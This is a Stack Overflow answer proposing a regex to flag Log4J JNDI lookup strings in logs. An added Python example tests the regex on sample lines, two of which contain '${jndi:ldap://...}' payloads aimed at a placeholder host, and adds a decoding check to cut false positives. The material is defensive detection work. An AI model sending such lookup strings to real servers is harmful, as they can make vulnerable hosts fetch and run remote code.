Answer by warren for Please help me improve this Log4J Regex that pulls out possible Malicious Sources

Based on the samples you provided, this regex seems to match what you’re looking for:

([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)

Check out Regex101’s "EXPLANATION" box for what it’s doing.

But it returns 8 matches in 686 steps.

from User warren – Stack Overflow https://stackoverflow.com/questions/70613366/please-help-me-improve-this-log4j-regex-that-pulls-out-possible-malicious-source/70624021#70624021
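
The pattern from the answer run over four constructed log lines, with a decode-and-check second stage to separate real lookup strings from incidental matches; this is an added example, not part of warren's answer. The named group is spelled `(?P<...>)` for Python's `re`, and the sample lines, `confirmed` and `triage` are assumptions of this example.

```python
import re
from urllib.parse import unquote

# The answer's pattern; only the named group is respelled as (?P<...>),
# because Python's re module does not accept (?<name>...).
PATTERN = re.compile(
    r"([\$]|[\%24]){1,3}"
    r"(?P<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+"
    r"[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"
)

# Constructed sample log lines (not from the question). Line 4 is benign:
# [\%24] and [\%7B] each match ONE listed character, so "27" starts a match.
SAMPLE_LINES = [
    "2022-01-06 10:15:01 GET /?q=${jndi:ldap://host.example.test/a} HTTP/1.1",
    "2022-01-06 10:15:02 GET /?q=%24%7Bjndi:ldap://host.example.test/a%7D HTTP/1.1",
    "2022-01-06 10:15:03 GET /index.html HTTP/1.1",
    "2022-01-27 10:15:04 GET /index/data/file.txt HTTP/1.1",
]


def scan(lines):
    """Return (line_number, captured_text) for every line the pattern hits."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = PATTERN.search(line)
        if match:
            hits.append((number, match.group("suspicious_log4j")))
    return hits


def confirmed(line):
    """Second-stage check (assumption of this example): after URL-decoding,
    the line must contain a literal '${' lookup opener."""
    return "${" in unquote(line)


def triage(lines):
    """Split pattern hits into confirmed and unconfirmed line numbers."""
    result = {"confirmed": [], "unconfirmed": []}
    for number, _ in scan(lines):
        key = "confirmed" if confirmed(lines[number - 1]) else "unconfirmed"
        result[key].append(number)
    return result


if __name__ == "__main__":
    print(scan(SAMPLE_LINES), triage(SAMPLE_LINES))
```

Because the final `.+` is greedy, the captured group always runs to the end of the line, so the capture is best treated as a pointer to the log line rather than as the extracted lookup string.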